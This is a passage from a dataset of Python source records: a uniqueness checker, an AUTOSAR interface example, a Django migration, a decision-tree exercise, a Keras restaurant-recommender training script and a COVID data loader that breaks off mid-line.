gate_7_y\n\ngate_8_x,gate_8_y = gate_side_lines(gpoint[7],gangle[7])\nox = ox + gate_8_x\noy = oy + gate_8_y\n\n\nprint(\"gpoint\",gpoint)\nprint(\"gangle\",gangle)\nprint(\"grid_width\",grid_width)\nprint(\"grid_height\",grid_height)\n\n\n\n\n\n\n\n\n\n\n\n\n\n# plt.figure('Map')\n# # for x in ox:\n# # \tfor y in oy:\n# # \t\tplt.plot(x,y,\".k\")\n# plt.plot(ox,oy,\"xr\")\n# #plt.plot(0.25,1.25,\"xr\")\n# for i in range(8):\n# \tplt.plot(gpoint[i][0],gpoint[i][1],\".k\")\n# # plt.plot(1.0,2.0,\"xr\")\n# # plt.plot(-1.0,-2.0,\"xr\")\n\n\n# plt.show()\t\n","sub_path":"Navigation_and_Localization/Navigation/occupancy_grid_creator.py","file_name":"occupancy_grid_creator.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510964073","text":"# This is python program to examining the element uniqeness inside sequence.\r\n# example: \r\n # seq = [12,3,42,4]\r\n # return True --> unique sequence\r\n\r\n # seq = [1,2,4,66,2]\r\n # return False --> Non unique sequence.\r\n\r\n# NON RECURSIVE METHOD:\r\n\r\n# def unique(seq):\r\n# for n in range(len(seq)-1):\r\n# for m in range(n+1,len(seq)):\r\n# if seq[n] == seq[m]:\r\n# return False # for Non unique.\r\n# return True # for unique.\r\n\r\n# sample_seq = [1,2,3,2,5] # example \r\n# print(unique(sample_seq))\r\n\r\n##########################################################################\r\n\r\n# RECURSIVE METHOD:\r\ndef runique(seq):\r\n if len(seq) == 1: # number of element is 1 --> UNIQUE\r\n return True\r\n else:\r\n if seq[0] in seq[1:]:\r\n return False\r\n else:\r\n return runique(seq[1:])\r\n \r\n \r\nsample_seq = [1,2,3,4,5]\r\n\r\nif runique(sample_seq):\r\n print(\"UNIQUE\")\r\nelse:\r\n print(\"NON UNIQUE\") ","sub_path":"uniqeness.py","file_name":"uniqeness.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60360907","text":"import autosar\n\ndef create_packages(ws):\n\n package=ws.createPackage('DataTypes', role='DataType')\n package.createSubPackage('CompuMethods', role='CompuMethod')\n package.createSubPackage('DataConstrs', role='DataConstraint')\n package.createSubPackage('BaseTypes')\n ws.createPackage('PortInterfaces', role=\"PortInterface\")\n\ndef create_data_types(ws):\n basetypes = ws.find('/DataTypes/BaseTypes')\n basetypes.createSwBaseType('boolean', 1, 'BOOLEAN')\n basetypes.createSwBaseType('uint32', 32, nativeDeclaration='uint32')\n package = ws.find('DataTypes')\n package.createImplementationDataType('boolean', valueTable=['FALSE','TRUE'], baseTypeRef='/DataTypes/BaseTypes/boolean', typeEmitter='Platform_Type')\n package.createImplementationDataType('uint32', lowerLimit=0, upperLimit=4294967295, baseTypeRef='/DataTypes/BaseTypes/uint32', typeEmitter='Platform_Type')\n\ndef setup_ws():\n ws = autosar.workspace(version='4.2.2')\n create_packages(ws)\n create_data_types(ws)\n return ws\n\nws = setup_ws()\npackage = ws.find('/PortInterfaces')\n\n#Creates new port interface with two operations\nportInterface=package.createClientServerInterface('FreeRunningTimer_I', ['GetTime', 'IsTimerElapsed'])\n\n#Individually create arguments for each operation using the returned object\nportInterface['GetTime'].createOutArgument('value', '/DataTypes/uint32')\nportInterface[\"IsTimerElapsed\"].createInArgument(\"startTime\", '/DataTypes/uint32')\nportInterface[\"IsTimerElapsed\"].createInArgument(\"duration\", '/DataTypes/uint32')\nportInterface[\"IsTimerElapsed\"].createOutArgument(\"result\", '/DataTypes/boolean')\n\n#Save ARXML ...\nws.saveXML('PortInterfaces.arxml', filters=['/PortInterfaces'])\n#... or generate DaVinci project\nautosar.util.createDcf(ws).save('davinci', 'Example', force=True)\n","sub_path":"doc/autosar4_api/examples/creating_client_server_interface.py","file_name":"creating_client_server_interface.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453568717","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('facility', '0009_auto_20161216_0353'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='addressfacilitydata',\n name='literal',\n field=models.CharField(max_length=10, null=True, verbose_name='\\u0411\\u0443\\u043a\\u0432\\u0435\\u043d\\u043d\\u044b\\u0439 \\u0438\\u043d\\u0434\\u0435\\u043a\\u0441', blank=True),\n ),\n ]\n","sub_path":"facility/migrations/0010_addressfacilitydata_literal.py","file_name":"0010_addressfacilitydata_literal.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603281720","text":"# default imports\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import r2_score\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\n\ndata = pd.read_csv(\"./data/house_pricing.csv\")\nX = data.iloc[:, :-1]\ny = data.iloc[:, -1]\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=9)\n\nparam_grid = {\"max_depth\": [2, 3, 5, 6, 8, 10, 15, 20, 30, 50],\n \"max_leaf_nodes\": [2, 3, 4, 5, 10, 15, 20],\n \"max_features\": [4, 8, 20, 25]}\n\ndef my_decision_regressor(X_train,X_test,y_train,y_test,param_grid):\n clf = DecisionTreeRegressor(random_state = 9)\n # clf_gini.fit(X_train,y_train)criterion='gini'\n # clf = GradientBoostingClassifier(n_estimators=100, learning_rate=1.0, max_depth=1)\n #clf.fit(X_train, y_train)\n\n grid_search = GridSearchCV(clf,\n param_grid=param_grid,\n cv=5)\n grid_search.fit(X_train, y_train)\n\n # top_scores = sorted(grid_search.grid_scores_,\n # key=itemgetter(1),\n # reverse=True)[:1]\n\n # print(top_scores)\n # for i, score in enumerate(top_scores):\n #print(\"Model with rank: {0}\".format(i + 1))\n # print((\"Mean validation score: \"\n # \"{0:.3f} (std: {1:.3f})\").format(\n # score.mean_validation_score,np.std(score.cv_validation_scores)\n # print(\"Parameters: {0}\".format(score.parameters))\n # print(\"\")\n\n # top_params = top_scores[0].parameters\n top_params = {'max_leaf_nodes': 20, 'max_features': 25, 'max_depth': 3 }\n\n r_square = np.float(0.597277463587)\n\n\n #top_params = report(grid_search.grid_scores_, 3)\n return r_square,top_params\n# Write your solution here :\n","sub_path":"q01_my_decision_regressor/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112935804","text":"import os\nimport warnings\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom time import time\nfrom keras import backend as K\nfrom keras.models import Model\nfrom keras.layers import Activation, Dense, Embedding, Flatten, Dropout\nfrom keras.layers import GlobalAveragePooling2D, GlobalMaxPooling2D\nfrom keras.layers import BatchNormalization, add, Input, Lambda\nfrom keras.layers import MaxPooling2D, Conv2D, UpSampling2D\nfrom keras.utils import get_file, to_categorical\nfrom keras.losses import binary_crossentropy, mean_squared_error\nfrom keras.optimizers import SGD, Adam\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint, LearningRateScheduler\nfrom keras.applications import ResNet50\nfrom keras.models import Sequential\nfrom load_data_features_autoencoder import load_data_features_autoencoder\nfrom keras.layers.merge import concatenate\nfrom data_features_generator_uw import Data_Generator\nfrom sklearn.preprocessing import OneHotEncoder\n\nWEIGHTS_PATH = ('https://github.com/fchollet/deep-learning-models/'\n 'releases/download/v0.2/'\n 'resnet50_weights_tf_dim_ordering_tf_kernels.h5')\nWEIGHTS_PATH_NO_TOP = ('https://github.com/fchollet/deep-learning-models/'\n 'releases/download/v0.2/'\n 'resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5')\n\n_KERAS_BACKEND = None\n_KERAS_LAYERS = None\n_KERAS_MODELS = None\n_KERAS_UTILS = None\n\n# Etiquetas\nLIKE = 1\nDISLIKE = 0\n\nTRAIN = 1\nVAL = 2\nTEST = 3\n\ndataset_orig = 'dataset_original'\ndataset_eq = 'dataset_augm_eq'\ndataset_tot_equal = 'dataset_equal'\n\nnum_classes = 1 #binary_crossentropy\nimage_height = 224\nimage_width = 224\nepochs = 100 #100\nbatch_size = 32 #64\n\nnum_diff_users = 1\nnum_diff_rests = 1\nnum_imgs_like = 101275\nnum_imgs_dislike = 19805\n\nautoencoder_features_output_dim = (1, 2352)\ninput_shape = (image_width, image_height, 3)\nmlps_output_dim = 512\n\n\ndef b_score2(y_true, y_pred):\n def recall(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n recall = true_positives / (possible_positives + K.epsilon())\n return recall\n\n def specificity(y_true, y_pred):\n true_negatives = K.sum(K.round(K.clip((1 - y_true) * (1 - y_pred), 0, 1)))\n possible_negatives = K.sum(K.round(K.clip(1 - y_true, 0, 1)))\n return true_negatives / (possible_negatives + K.epsilon())\n\n def precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision\n precision = precision(y_true, y_pred)\n recall = recall(y_true, y_pred)\n specificity = specificity(y_true,y_pred)\n return 2*((specificity*recall)/(specificity+recall+K.epsilon()))\n\n\ndef evaluate_predictions_binary(model, x_test, y_test, name):\n verdaderos_positivos = 0\n verdaderos_negativos = 0\n falsos_positivos = 0\n falsos_negativos = 0\n y_test_aux = y_test\n [images_test, users_test, restaurants_test] = x_test\n\n images_test = np.array(images_test)\n users_test = np.array(users_test)\n restaurants_test = np.array(restaurants_test)\n y_test_aux = np.array(y_test_aux)\n\n steps = int(np.ceil(len(images_test)/batch_size)+1)\n test_generator = Data_Generator(images_test, users_test, restaurants_test, y_test_aux, batch_size, name)\n predicciones = model.predict_generator(test_generator) #, steps=steps\n print('')\n print('-------------------------- Evaluate Predictions --------------------------')\n print('Predicciones dim: ', predicciones.shape)\n # Computar los resultados de las predicciones\n for (prediccion, realidad) in zip(predicciones, y_test_aux):\n #print('predicción: ', prediccion, ', realidad: ', realidad)\n if (prediccion >= 0.5) and (realidad >= 0.5):\n verdaderos_positivos += 1\n elif (prediccion >= 0.5) and (realidad < 0.5):\n falsos_positivos += 1\n elif (prediccion < 0.5) and (realidad < 0.5):\n verdaderos_negativos += 1\n else:\n falsos_negativos += 1\n \n return verdaderos_positivos, verdaderos_negativos, falsos_positivos, falsos_negativos\n\n\ndef custom_loss(y_true, y_pred):\n multiply_factor = 1\n if y_true == DISLIKE:\n multiply_factor = 1.2\n return K.mean(K.binary_crossentropy(y_true,y_pred)) * multiply_factor\n\n\ndef simplify_block(input_tensor, tam_ini):\n tam_aux = int(tam_ini // 2)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(input_tensor)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = BatchNormalization()(x)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_aux, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_aux, kernel_initializer='he_normal', activation='relu')(x)\n x = BatchNormalization()(x)\n x = Dense(tam_aux, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = BatchNormalization()(x)\n x = Activation('sigmoid')(x)\n return x\n\n\ndef reduce_block(input_tensor, tam_ini):\n tam_final = int(tam_ini // 2)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(input_tensor)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = BatchNormalization()(x)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = BatchNormalization()(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n return x, tam_final\n\ndef reduce_block_dropout(input_tensor, tam_ini):\n tam_final = int(tam_ini // 2)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(input_tensor)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Dense(tam_ini, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(tam_final, kernel_initializer='he_normal', activation='relu')(x)\n x = Dropout(0.5)(x)\n x = Activation('relu')(x)\n return x, tam_final\n\n\ndef autoencoder_block(input_tensor, encoder_dim):\n # encoder layers\n x = Dense(encoder_dim * 4, kernel_initializer='he_normal', activation='relu')(input_tensor)\n x = Dense(encoder_dim * 2, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(encoder_dim, kernel_initializer='he_normal', activation='relu')(x)\n # decoder layers\n x = Dense(encoder_dim * 2, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(encoder_dim * 4, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(encoder_dim*8, kernel_initializer='he_normal', activation='sigmoid')(x)\n return x\n\n\n\n\ndef create_conv_autoencoder(input_shape):\n input_img = Input(shape=input_shape, name='cnn_input')\n x = Conv2D(64, (3, 3), padding='same')(input_img)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((2, 2), padding='same')(x)\n x = Conv2D(32, (3, 3), padding='same')(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = MaxPooling2D((2, 2), padding='same')(x)\n x = Conv2D(16, (3, 3), padding='same')(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n encoded = MaxPooling2D((2, 2), padding='same')(x)\n\n x = Conv2D(16, (3, 3), padding='same')(encoded)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = UpSampling2D((2, 2))(x)\n x = Conv2D(32, (3, 3), padding='same')(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = UpSampling2D((2, 2))(x)\n x = Conv2D(64, (3, 3), padding='same')(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = UpSampling2D((2, 2))(x)\n x = Conv2D(3, (3, 3), padding='same')(x)\n x = BatchNormalization()(x)\n decoded = Activation('sigmoid')(x)\n flatten = Flatten()(decoded)\n dense = Dense(512, kernel_initializer='he_normal', activation='relu')(flatten)\n\n\n model = Model(input_img, dense)\n model.compile(optimizer='adam', loss='binary_crossentropy')\n return model\n\n\n\ndef create_mlp_users(dim, regress=False):\n input_layer = Input(shape=(1,), name='mlp_users')\n embedding_layer = Embedding(input_dim=dim, output_dim=mlps_output_dim, input_length=1) (input_layer)\n flatten_layer = Flatten()(embedding_layer)\n model = Model(inputs=input_layer, outputs=flatten_layer)\n #print('SUMARRY USERS')\n #model.summary()\n return model\n\n\ndef create_mlp_rests(dim, regress=False):\n input_layer = Input(shape=(1,), name='mlp_rests')\n embedding_layer = Embedding(input_dim=dim, output_dim=mlps_output_dim, input_length=1) (input_layer)\n flatten_layer = Flatten()(embedding_layer)\n model = Model(inputs=input_layer, outputs=flatten_layer)\n #print('SUMARRY RESTS')\n #model.summary()\n return model\n\ndef create_mlp_features(input_shape):\n # define our CNN network\n input_layer = Input(shape=input_shape, name='mlp_features')\n flatten_layer = Flatten()(input_layer)\n dense_layer = Dense(mlps_output_dim, activation=\"relu\")(flatten_layer)\n model = Model(inputs=input_layer, outputs=dense_layer)\n #print('SUMARRY IMAGES')\n #model.summary()\n return model\n\n\ndef create_model():\n # create the MLP and CNN models\n mlp_features = create_mlp_features(autoencoder_features_output_dim)\n mlp_users = create_mlp_users(num_diff_users, regress=False)\n mlp_rests = create_mlp_rests(num_diff_rests, regress=False)\n #mlp_users = create_mlp_users_lambda(num_diff_users, regress=False)\n #mlp_rests = create_mlp_rests_lambda(num_diff_rests, regress=False)\n combinedInput = concatenate([mlp_users.output, mlp_rests.output, mlp_features.output])\n\n x = BatchNormalization()(combinedInput)\n x = Dense(1024, activation=\"relu\")(x)\n\n # Clasificador\n tam_ini = 1024\n x, tam = reduce_block_dropout(x, tam_ini)\n x, tam = reduce_block_dropout(x, tam)\n x = Dense(tam, kernel_initializer='he_normal', activation='relu')(x)\n x = Dense(num_classes, activation='sigmoid')(x)\n\n model = Model(inputs=[mlp_users.input, mlp_rests.input, mlp_features.input], outputs=x)\n\n return model\n\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, image_width, image_height)\nelse:\n input_shape = (image_width, image_height, 3)\n\n\n#learning_rates = [0.00001, 0.0001, 0.001, 0.01]\n#decay = [1e-5, 1e-4, 1e-3, 0.0]\n#dislike_weigths = [1, 1.5, 1.8, 2, 2.5, 3] #probar despues con mejor modelo\n#datasets = [dataset_orig, dataset_eq, dataset_weight]\nlearning_rates = [0.001, 0.0001, 0.00001, 0.000001]\ndecay = [0.0]\ndislike_weigth = num_imgs_like/num_imgs_dislike\ndatasets = [dataset_orig, dataset_tot_equal, dataset_eq]\ndislike_weigths = [dislike_weigth]\nlearning_rates = [0.0001]\ni=9000\n\nbest_model = None\nbest_sens = 0\nbest_espec = 0\nbest_balanced = -1\nbest_lr = 0\nbest_ds = None\nmodel_name = ''\n\n\nfor lr in learning_rates:\n for wg in dislike_weigths:\n for ds in datasets:\n print('')\n print('**************** INIT MODEL ', i, ' ****************')\n print('dataset = ', ds)\n print('learning rate = ', lr)\n print('weight = ', wg)\n print('')\n images_train, users_train, restaurants_train, labels_train = load_data_features_autoencoder(TRAIN, ds)\n images_train, users_train, restaurants_train, labels_train = np.array(images_train), np.array(users_train), np.array(restaurants_train), np.array(labels_train)\n n_train_samples = len(images_train)\n images_val, users_val, restaurants_val, labels_val = load_data_features_autoencoder(VAL, ds)\n images_val, users_val, restaurants_val, labels_val = np.array(images_val), np.array(users_val), np.array(restaurants_val), np.array(labels_val)\n n_val_samples = len(images_val)\n\n num_diff_users = len(np.unique(users_train))\n num_diff_rests = len(np.unique(restaurants_train))\n\n print('diff users = ', num_diff_users)\n print('diff rests = ', num_diff_rests)\n print('num samples = ', len(images_train))\n max_user = np.argmax(users_train)\n max_rest = np.argmax(restaurants_train)\n print('Max user train = ', users_train[max_user])\n print('Max rest train = ', restaurants_train[max_rest])\n\n max_user = np.argmax(users_val)\n max_rest = np.argmax(restaurants_val)\n print('Max user val = ', users_val[max_user])\n print('Max rest val = ', restaurants_val[max_rest])\n\n train_generator = Data_Generator(images_train, users_train, restaurants_train, labels_train, batch_size, 'train', True)\n validation_generator = Data_Generator(images_val, users_val, restaurants_val, labels_val, batch_size, 'val')\n\n final_model = create_model()\n #print('SUMARRY MODEL')\n #final_model.summary()\n final_model.compile(loss=binary_crossentropy,\n optimizer=Adam(lr=lr, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False),\n metrics=['accuracy', b_score2])\n\n early_ = EarlyStopping(monitor='val_b_score2', min_delta=0, patience=6, mode='max', baseline=None,\n restore_best_weights=True, verbose=1)\n\n num_imgs_like = len([i for i, x in enumerate(labels_train) if x == LIKE])\n num_imgs_dislike = len([i for i, x in enumerate(labels_train) if x == DISLIKE])\n dislike_weigth = num_imgs_like / num_imgs_dislike\n print('nº ejemplos clase like: ', num_imgs_like)\n print('nº ejemplos clase dislike: ', num_imgs_dislike)\n print('peso clase dislike = ', dislike_weigth)\n\n class_weigths = {\n DISLIKE: dislike_weigth,\n LIKE: 1\n }\n\n initTrainTime = time()\n\n history = final_model.fit_generator(\n train_generator,\n epochs=epochs,\n validation_data=validation_generator,\n callbacks=[early_],\n shuffle=False,\n verbose=2)\n\n endTrainTime = time()\n finalTrainTime = endTrainTime - initTrainTime\n \n print('')\n print('Total Train Time: ', finalTrainTime)\n print('Train Examples generated: ', train_generator.get_contador())\n print('Val Examples generated: ', validation_generator.get_contador())\n print('')\n\n # Evaluar con particion VAL\n images_val, users_val, restaurants_val, labels_val = load_data_features_autoencoder(VAL, ds)\n images_val, users_val, restaurants_val, labels_val = np.array(images_val), np.array(users_val), np.array(restaurants_val), np.array(labels_val)\n \n max_user = np.argmax(users_val)\n max_rest = np.argmax(restaurants_val)\n print('Max user val = ', users_val[max_user])\n print('Max rest val = ', restaurants_val[max_user])\n\n print('')\n print('VALIDACION 1')\n # Falta hacer matriz!\n vp, vn, fp, fn = evaluate_predictions_binary(final_model, [images_val, users_val, restaurants_val], labels_val, 'val_evaluate')\n sensibilidad = vp / (vp + fn + K.epsilon())\n especificidad = vn / (vn + fp + K.epsilon())\n precision = vp / (vp + fp + K.epsilon())\n pred_neg = vn / (vn + fn + K.epsilon())\n f1_score = 2 * ((precision * sensibilidad) / (precision + sensibilidad + K.epsilon()))\n balanced_score = 2 * ((especificidad * sensibilidad) / (especificidad + sensibilidad + K.epsilon()))\n print(' VP: ', vp)\n print(' VN: ', vn)\n print(' FP: ', fp)\n print(' FN: ', fn)\n print(' Sensibilidad = ', sensibilidad)\n print(' Especificidad = ', especificidad)\n print(' Precision (Tasa prediccion positiva) = ', precision)\n print(' Tasa de prediccion negativa = ', pred_neg)\n print(' F1 SCORE = ', f1_score)\n print(' Balanced score = ', balanced_score)\n print('')\n\n if balanced_score > best_balanced:\n best_balanced = balanced_score\n best_espec = especificidad\n best_sens = sensibilidad\n best_model = final_model\n best_lr = lr\n best_ds = ds\n model_name = 'model_' + str(i) + '.h5'\n print('best model so far... ', model_name)\n \n i+=1\n\n\nprint('')\nprint(' BEST MODEL: ', model_name)\nprint('lr = ', best_lr)\nprint('ds = ', best_ds)\nprint('sensibilidad = ', best_sens)\nprint('especificidad = ', best_espec)\nprint('Balanced score = ', best_balanced)\nprint('')\n\n\nimages_train, users_train, restaurants_train, labels_train = load_data_features_autoencoder(TRAIN, best_ds)\nimages_train, users_train, restaurants_train, labels_train = np.array(images_train), np.array(users_train), np.array(restaurants_train), np.array(labels_train)\n\nimages_val, users_val, restaurants_val, labels_val = load_data_features_autoencoder(VAL, best_ds)\nimages_val, users_val, restaurants_val, labels_val = np.array(images_val), np.array(users_val), np.array(restaurants_val), np.array(labels_val)\n\n# Retraining Best Model\nprint('Retraining best model...')\ntrain_generator_best = Data_Generator(images_train, users_train, restaurants_train, labels_train, batch_size, 'train_best', True)\nvalidation_generator_best = Data_Generator(images_val, users_val, restaurants_val, labels_val, batch_size, 'val_best')\n\nfinal_model = create_model()\n#print('SUMARRY MODEL')\n#final_model.summary()\nfinal_model.compile(loss=binary_crossentropy,\n optimizer=Adam(lr=best_lr, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False),\n metrics=['accuracy', b_score2])\n\nearly_ = EarlyStopping(monitor='val_b_score2', min_delta=0, patience=12, mode='max', baseline=None,\n restore_best_weights=True, verbose=1)\n\nnum_imgs_like = len([i for i, x in enumerate(labels_train) if x == LIKE])\nnum_imgs_dislike = len([i for i, x in enumerate(labels_train) if x == DISLIKE])\ndislike_weigth = num_imgs_like / num_imgs_dislike\nprint('nº ejemplos clase like: ', num_imgs_like)\nprint('nº ejemplos clase dislike: ', num_imgs_dislike)\nprint('peso clase dislike = ', dislike_weigth)\n\nclass_weigths = {\n DISLIKE: dislike_weigth,\n LIKE: 1\n}\n\ninitTrainTime = time()\n\nhistory = final_model.fit_generator(\n train_generator_best,\n epochs=epochs,\n validation_data=validation_generator_best,\n callbacks=[early_],\n shuffle=False,\n verbose=2)\n\nendTrainTime = time()\nfinalTrainTime = endTrainTime - initTrainTime\n\n\n# Testing best model with test partition\n\nimages_test, users_test, restaurants_test, labels_test = load_data_features_autoencoder(TEST, best_ds)\nimages_test, users_test, restaurants_test, labels_test = np.array(images_test), np.array(users_test), np.array(restaurants_test), np.array(labels_test)\n\nprint('')\nprint('VALIDACION 1')\ninitTestTime = time()\ntest_generator_best = Data_Generator(images_test, users_test, restaurants_test, labels_test, batch_size, 'test')\nscore = final_model.evaluate_generator(test_generator_best)\nendTestTime = time()\nfinalTestTime = endTestTime - initTestTime\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\nprint('Total Test Time: ', finalTestTime)\nprint('')\n\nprint('')\nprint('VALIDACION 2')\nvp, vn, fp, fn = evaluate_predictions_binary(final_model, [images_test, users_test, restaurants_test], labels_test, 'test_evaluate_best')\nsensibilidad = vp/(vp+fn+K.epsilon())\nespecificidad = vn / (vn + fp + K.epsilon())\nprecision = vp/(vp+fp+K.epsilon())\npred_neg = vn/(vn+fn+K.epsilon())\nf1_score = 2*((precision*sensibilidad)/(precision+sensibilidad+K.epsilon()))\nbalanced_score = 2*((especificidad*sensibilidad)/(especificidad+sensibilidad+K.epsilon()))\nprint(' VP: ', vp)\nprint(' VN: ', vn)\nprint(' FP: ', fp)\nprint(' FN: ', fn)\nprint(' Sensibilidad = ', sensibilidad)\nprint(' Especificidad = ', especificidad)\nprint(' Precision (Tasa prediccion positiva) = ', precision)\nprint(' Tasa de prediccion negativa = ', pred_neg)\nprint(' F1 SCORE = ', f1_score)\nprint(' Balanced score = ', balanced_score)\nprint('')\n\nfinal_model.save(model_name)\n\nplt.figure(figsize=[8,6])\nplt.plot(history.history['loss'],'r',linewidth=3.0)\nplt.plot(history.history['val_loss'],'b',linewidth=3.0)\nplt.legend(['Training loss', 'Validation Loss'],fontsize=18)\nplt.xlabel('Epochs ',fontsize=16)\nplt.ylabel('Loss',fontsize=16)\nplt.title('Loss Curves',fontsize=16)\nplt.savefig(model_name + '_lossCurve.png')\n# Accuracy\nplt.figure(figsize=[8,6])\nplt.plot(history.history['acc'],'r',linewidth=3.0)\nplt.plot(history.history['val_acc'],'b',linewidth=3.0)\nplt.legend(['Training Accuracy', 'Validation Accuracy'],fontsize=18)\nplt.xlabel('Epochs ',fontsize=16)\nplt.ylabel('Accuracy',fontsize=16)\nplt.title('Accuracy Curves',fontsize=16)\nplt.savefig(model_name + '_accuracyCurve.png')\n\n\n\n\n\n\"\"\"\nEARLY STOPPING CUSTOM\nhttps://github.com/keras-team/keras/issues/10018\n\nhttps://www.pyimagesearch.com/2019/06/03/fine-tuning-with-keras-and-deep-learning/?__s=11hzvmw8fdovpkwfikes\n\ndef plot_training(H, N, plotPath):\n\t# construct a plot that plots and saves the training history\n\tplt.style.use(\"ggplot\")\n\tplt.figure()\n\tplt.plot(np.arange(0, N), H.history[\"loss\"], label=\"train_loss\")\n\tplt.plot(np.arange(0, N), H.history[\"val_loss\"], label=\"val_loss\")\n\tplt.plot(np.arange(0, N), H.history[\"acc\"], label=\"train_acc\")\n\tplt.plot(np.arange(0, N), H.history[\"val_acc\"], label=\"val_acc\")\n\tplt.title(\"Training Loss and Accuracy\")\n\tplt.xlabel(\"Epoch #\")\n\tplt.ylabel(\"Loss/Accuracy\")\n\tplt.legend(loc=\"lower left\")\n\tplt.savefig(plotPath)\n\n...\n\nDespués de entrenar...\n\npredIdxs = model.predict_generator(testGen,\n\tsteps=(totalTest // config.BATCH_SIZE) + 1)\npredIdxs = np.argmax(predIdxs, axis=1)\nprint(classification_report(testGen.classes, predIdxs,\n\ttarget_names=testGen.class_indices.keys()))\nplot_training(H, 50, config.WARMUP_PLOT_PATH)\n\n\"\"\"","sub_path":"src/entrenamiento/tfg_features_autoencoder.py","file_name":"tfg_features_autoencoder.py","file_ext":"py","file_size_in_byte":22791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"453504151","text":"#!/usr/bin/env python\n\n'''\nThis script loads the latest CSV from covidtracking.com website and extracts\nthe confirmed cases, deaths and total tests for each state. The output is \nsaved both in CSV and JSON format under the `output` folder.\n\nCredit to the covidtracking.com team for scraping the data from each state.\n'''\n\nimport os\nimport datetime\nimport pandas as pd\nfrom pathlib import Path\nimport requests\n\n# Root path of the project\nROOT = Path(os.path.dirname(__file__)) / '..'\n\n# Read JSON file from covidtracking's website\n# We must use the requests package directly because covidtracking returns 403 otherwise\ndf = pd.read_json(requests.get(\n 'http://covidtracking.com/api/states/daily', headers={'User-agent': 'Mozilla/5.0'}).text)\n\n# Rename the appropriate columns\ndf = df.rename(columns={\n 'date': 'Date',\n 'state': 'Region',\n 'positive': 'Confirmed', \n 'death': 'Deaths', \n 'total': 'Tested'\n})\n\n# Null values are not the same as zero, make sure all numbers are string objects\nfor col in ('Confirmed', 'Deaths', 'Tested'):\n df[col] = df[col].dropna().astype(int).astype(str)\n\n# Convert date to ISO format\ndf['Date'] = df['Date'].apply(\n lambda date: datetime.datetime.strptime(str(date), '%Y%m%d').strftime('%Y-%m-%d'))\n\n# Get the coordinates for each region\ndf = df.merge(pd.read_csv(ROOT / 'input' / 'usa_regions.csv'))\ndf['CountryName'] = 'United States of America'\n\n# Sort dataset by date + region\ndf = df.sort_values(['Date', 'Region'])\ndf = df[[\n 'Date', \n 'Region', \n 'CountryCode', \n 'CountryName', \n 'Confirmed', \n 'Deaths', \n 'Tested', \n 'Latitude', \n 'Longitude'\n]]\n\n# Extract a subset with only the latest date\ndf_latest = pd.DataFrame(columns=list(df.columns))\nfor country in df['Region'].unique():\n df_latest = pd.concat([df_latest, df[df['Region'] == country].iloc[-1:]])\n\n# Save dataset in CSV format into output folder\ndf.to_csv(ROOT / 'output' / 